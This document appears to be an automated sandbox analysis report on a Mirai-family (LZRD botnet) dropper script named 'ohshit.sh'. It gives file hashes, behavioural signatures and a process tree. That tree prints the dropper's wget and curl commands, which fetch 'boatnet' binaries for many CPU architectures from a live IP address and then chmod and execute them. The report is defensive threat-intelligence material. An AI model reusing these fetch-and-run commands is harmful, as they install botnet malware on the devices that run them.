Analysis

  • max time kernel
    149s
  • max time network
    42s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags
    arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  • submitted
    11/03/2025, 08:32

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    37b42f54fe3c72cb1eb5543a6c17f546

  • SHA1

    637b619c1d425218ed7ec1ae064fc85196423c45

  • SHA256

    ab63171a0b3118f9a223b6f0cf23303cdd2aafcbdff1e8024e9728a91f99ae8d

  • SHA512

    e201190305d13d12894dfe7c8cd9f0c5022ebbd3af2d573f64433f676c1b22131f1abecc9f85bce3b453de6661a10291595318d15f025465360fa52c78089f8a

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 15 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 15 IoCs
  • Modifies Watchdog functionality 1 TTPs 4 IoCs

    Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Writes file to system bin folder 4 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 15 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 27 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:648
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:650
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:667
    • /bin/cat
      cat boatnet.x86
      2⤵
      PID:675
    • /bin/chmod
      chmod +x boatnet.x86 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
      2⤵
      • File and Directory Permissions Modification
      PID:677
    • /tmp/WTF
      ./WTF
      2⤵
      PID:679
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:682
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.mips
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:685
    • /bin/cat
      cat boatnet.mips
      2⤵
      • System Network Configuration Discovery
      PID:686
    • /bin/chmod
      chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
      2⤵
      • File and Directory Permissions Modification
      PID:687
    • /tmp/WTF
      ./WTF
      2⤵
      PID:688
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.arc
      2⤵
      PID:690
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.arc
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:691
    • /bin/cat
      cat boatnet.arc
      2⤵
      PID:694
    • /bin/chmod
      chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
      2⤵
      • File and Directory Permissions Modification
      PID:696
    • /tmp/WTF
      ./WTF
      2⤵
      PID:698
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.i468
      2⤵
      PID:699
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.i468
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:703
    • /bin/cat
      cat boatnet.i468
      2⤵
      PID:709
    • /bin/chmod
      chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
      2⤵
      • File and Directory Permissions Modification
      PID:710
    • /tmp/WTF
      ./WTF
      2⤵
      PID:711
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.i686
      2⤵
      PID:712
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.i686
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:717
    • /bin/cat
      cat boatnet.i686
      2⤵
      PID:729
    • /bin/chmod
      chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
      2⤵
      • File and Directory Permissions Modification
      PID:730
    • /tmp/WTF
      ./WTF
      2⤵
      PID:731
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.x86_64
      2⤵
      PID:733
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.x86_64
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:737
    • /bin/cat
      cat boatnet.x86_64
      2⤵
      PID:745
    • /bin/chmod
      chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
      2⤵
      • File and Directory Permissions Modification
      PID:746
    • /tmp/WTF
      ./WTF
      2⤵
      PID:747
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.mpsl
      2⤵
      • Writes file to tmp directory
      PID:749
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.mpsl
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:757
    • /bin/cat
      cat boatnet.mpsl
      2⤵
      PID:759
    • /bin/chmod
      chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
      2⤵
      • File and Directory Permissions Modification
      PID:760
    • /tmp/WTF
      ./WTF
      2⤵
      PID:761
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.arm
      2⤵
      • Writes file to tmp directory
      PID:763
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.arm
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:764
    • /bin/cat
      cat boatnet.arm
      2⤵
      PID:768
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
      2⤵
      • File and Directory Permissions Modification
      PID:770
    • /tmp/WTF
      ./WTF
      2⤵
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:771
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.arm5
      2⤵
      • Writes file to tmp directory
      PID:775
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.arm5
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:781
    • /bin/cat
      cat boatnet.arm5
      2⤵
      PID:787
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
      2⤵
      • File and Directory Permissions Modification
      PID:789
    • /tmp/WTF
      ./WTF
      2⤵
      PID:791
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.arm6
      2⤵
      • Writes file to tmp directory
      PID:792
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.arm6
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:798
    • /bin/cat
      cat boatnet.arm6
      2⤵
      PID:804
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-Wq7mqf WTF
      2⤵
      • File and Directory Permissions Modification
      PID:805
    • /tmp/WTF
      ./WTF
      2⤵
      • Reads runtime system information
      PID:807
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.arm7
      2⤵
      • Writes file to tmp directory
      PID:809
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.arm7
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:812
    • /bin/cat
      cat boatnet.arm7
      2⤵
      PID:816
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
      2⤵
      • File and Directory Permissions Modification
      PID:817
    • /tmp/WTF
      ./WTF
      2⤵
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Reads runtime system information
      PID:818
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.ppc
      2⤵
      • Writes file to tmp directory
      PID:822
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.ppc
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:823
    • /bin/cat
      cat boatnet.ppc
      2⤵
      PID:824
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
      2⤵
      • File and Directory Permissions Modification
      PID:825
    • /tmp/WTF
      ./WTF
      2⤵
      PID:826
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.spc
      2⤵
      • Writes file to tmp directory
      PID:828
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.spc
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:830
    • /bin/cat
      cat boatnet.spc
      2⤵
      PID:832
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
      2⤵
      • File and Directory Permissions Modification
      PID:833
    • /tmp/WTF
      ./WTF
      2⤵
      PID:834
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.m68k
      2⤵
      • Writes file to tmp directory
      PID:836
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.m68k
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:837
    • /bin/cat
      cat boatnet.m68k
      2⤵
      PID:838
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
      2⤵
      • File and Directory Permissions Modification
      PID:839
    • /tmp/WTF
      ./WTF
      2⤵
      PID:840
    • /usr/bin/wget
      wget http://107.172.82.193/hiddenbin/boatnet.sh4
      2⤵
      • Writes file to tmp directory
      PID:842
    • /usr/bin/curl
      curl -O http://107.172.82.193/hiddenbin/boatnet.sh4
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:843
    • /bin/cat
      cat boatnet.sh4
      2⤵
      PID:844
    • /bin/chmod
      chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
      2⤵
      • File and Directory Permissions Modification
      PID:845
    • /tmp/WTF
      ./WTF
      2⤵
      PID:846

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/WTF
    Filesize: 23KB
    MD5: 6e0d03239183153de8b328368eec14c0
    SHA1: d4436c25ca650862b1d626bc735d621720c850c3
    SHA256: c28c0adf305d4225c9d21fa9c254519a07e24d4411b42b99c85d882be65a0d1b
    SHA512: e96bfb589fa14c9b373d12765b52d17d8f505ee2e55d26bae4067a0d738d89e4e5490927060f8331569c7df4943719fb12e4c36b464eb3c9496abdd8da80edcd

  • /tmp/WTF
    Filesize: 162B
    MD5: 1b7c22a214949975556626d7217e9a39
    SHA1: d01c97e2944166ed23e47e4a62ff471ab8fa031f
    SHA256: 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87
    SHA512: ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

  • /tmp/WTF
    Filesize: 57KB
    MD5: d55ad7ddc6b166522c3225839df619c3
    SHA1: bb4c61e25abce482514e76907840605cf1abbbf8
    SHA256: 6c73b9ee290ffc3d5671821ea05d67ca012b3617a432107dbfe8fab0f1b6d7c7
    SHA512: 94508665c042fae60ce9e21b262f120c7f5b19a92e55c497408c0d71f4a51718315465070bffec2e9293a73b99734a3c7bdbbedce33d80a8cca667e939170916

  • /tmp/boatnet.x86
    Filesize: 20KB
    MD5: 681dd964889eddd4cfdc230ba745767b
    SHA1: bdb24c1844bc8285e2bf781613149f6db7b4928d
    SHA256: fca185b5efc7e5df44003d8612f179414eadb71c31386c707a7e6f1f8809790e
    SHA512: ac2556dd6bf5c1fde0c0eea5c78037274065cbb5231969d572c8df8dafe3740c49d2c681d21e3abc0f786f1c617162af4c955543f28fe1462dbd196565c655a4